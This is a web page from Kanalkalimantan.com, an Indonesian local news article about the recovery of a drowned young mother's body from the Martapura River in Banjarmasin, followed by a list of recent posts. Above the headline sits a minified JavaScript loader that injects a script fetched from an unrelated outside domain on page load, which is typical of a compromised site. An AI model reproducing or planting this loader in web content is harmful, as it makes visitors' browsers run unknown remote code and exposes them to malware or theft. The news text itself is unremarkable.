(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Linda Ditemukan Tersangkut di Pampangan Ilung


KANALKALIMANTAN.COM, BANJARMASIN – Ibu muda yang tenggelam di dermaga Pasar Baru (Pasar Lima) Sungai Martapura, Banjarmasin ditemukan mengapung dalam kondisi tidak bernyawa, Jumat (1/12/2023) pagi.

Jasad Erlinda alias Linda (30) ditemukan cukup jauh dari lokasinya tenggelam yaitu di Batang 27 seberang Gang Gandapura, kawasan Jalan Tembus Mantuil, Kecamatan Banjarmasin Selatan.

“Jarak antara lokasi tenggelam dan penemuan lebih satu kilometer,” ungkap Korlap 1 BPBD Banjarmasin, Akhdiyat Yoshida.

Kondisi air sungai Martapura yang sedang surut mengalir ke muara dan waktu tenggelam lebih satu malam membuat jasad Linda terseret arus air Sungai Martapura cukup jauh.

Baca juga: Dua Belas Jam Pencarian, Perempuan Tenggelam di Dermaga Pasar Lima Banjarmasin Ditemukan Mengapung

Jasad ibu muda tersebut dikatakan pertama kali ditemukan warga di pampangan ilung (tumpukan eceng gondok) dengan posisi mengapung di bawah permukaan sungai.

Warga yang menemukan Linda mengapung sempat terjun ke sungai untuk mengaitkan tali ke tubuhnya supaya bisa ditarik ke tepi sungai.

“Warga yang menemukan di antara pampangan ilung dan ditarik ke tepi agar tidak terseret arus surut sungai,” ungkap Yosi.

Tidak lama setelah penemuan, jasad Linda kemudian dilakukan evakuasi oleh petugas Basarnas dan BPBD Banjarmasin dan sempat disandarkan di dermaga Polairud Polresta Banjarmasin.

Baca juga: Perempuan Tenggelam di Dermaga Pasar Lima Banjarmasin, Warga Sempat Lihat Linda Melambai

Suami Linda yang sejak Kamis (30/11/2023) siang, menunggu kepastian kedatangan jasad istrinya yang sudah dinyatakan meninggal dunia.

“Saat ini jenazahnya sudah dievakuasi ke RSUD Ulin Banjarmasin,” pungkasnya.

Perempuan di Dermaga Pasar Baru Banjarmasin Tenggelam, Warga Sempat Lihat Tangan Korban Melambai

Sebelumnya diketahui, Linda dikabarkan tenggelam di kawasan dermaga Pasar Baru, Kecamatan Banjarmasin Tengah pada Kamis (30/11/2023) sekitar pukul 13.30 Wita.

Baca juga: Atlet IBCA MMA Kalsel Raih 6 Medali di Kejurnas Piala Kemenpora 2023

Seorang pedagang warung di sekitar dermaga Pasar Lima kawasan Sungai Martapura, Juamiati waktu itu mengaku sempat melihat kepala dan tangan korban berada di sungai.

Saat itu, posisi korban dikatakannya terbawa arus sambil melambai-lambaikan tangan seperti minta tolong. Posisinya tepat di depan warungnya yang berada di bantaran Sungai Martapura.

“Tiba-tiba ada yang larut (diseret air) di sini, tangannya melambai-lambai,” ungkap Jumiati sambil memperagakan yang ia lihat.

Kemudian beberapa meter setelah kepala dan tangan korban timbul, setelah itu saksi mengaku tidak melihatnya lagi alias sudah tenggelam.

Baca juga: Motor Hilang di Teras Rumah, Pencuri Dibekuk Reskrim Banjarmasin Barat

Setelah melihat perempuan tersebut tenggelam, ia dan adiknya yang juga berada di lokasi sempat teriak meminta pertolongan kepada warga.

Namun, saat itu dikatakan suasana sedang sunyi dan tidak ada warga di sekitar dermaga. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Risa

Recent Posts

Silaturahmi Camat Lurah RT RW, Paman Birin Cerita Pernah Jadi Lurah dan Sekcam

KANALKALIMANTAN.COM, BANJARMASIN - Gubernur Kalimantan Selatan (Kalsel) H Sahbirin Noor bercerita perjalanan karirnya sebelum menjadi… Read More

3 jam ago

APILL Terpasang di Samsat Banjarbaru, Dua Jalan Jadi Perempatan

DPUPR Banjarbaru akan Bongkar Median Sepanjang 35 Meter Read More

3 jam ago

Chaos Banjarmasin di Atas Kanvas, Tragedi Kelam Jumat Kelabu 23 Mei 1997

“Setiap goresan kuas di lukisan ini, saya terbayang, merasakan terbawa kedalam suasana, di saat kerusuhan… Read More

7 jam ago

Perpisahan Siswa SMAN 1 Kapuas, Erlin Hardi : Belajar, Belajar, dan Belajar!

KANALKALIMANTAN.COM, KUALA KAPUAS - Pendidikan merupakan tolak ukur kemajuan suatu bangsa. Dengan pendidikan yang baik… Read More

8 jam ago

Nilai Posisi Waspada, Pemkab Kapuas Gelar Rakor SPI MCP dan LHKPN

KANALKALIMANTAN.COM, KUALA KAPUAS - Pemerintah Kabupaten (Pemkab) Kapuas melalui Inspektorat melaksanakan rapat koordinasi (Rakor) terkait… Read More

9 jam ago

LITERASI EMOSIONAL DI MEDIA SOSIAL: MENGELOLA EMOSI DAN INTERAKSI ONLINE

"WEBINAR INDONESIA MAKIN CAKAP DIGITAL" WILAYAH KALIMANTAN Read More

10 jam ago

This website uses cookies.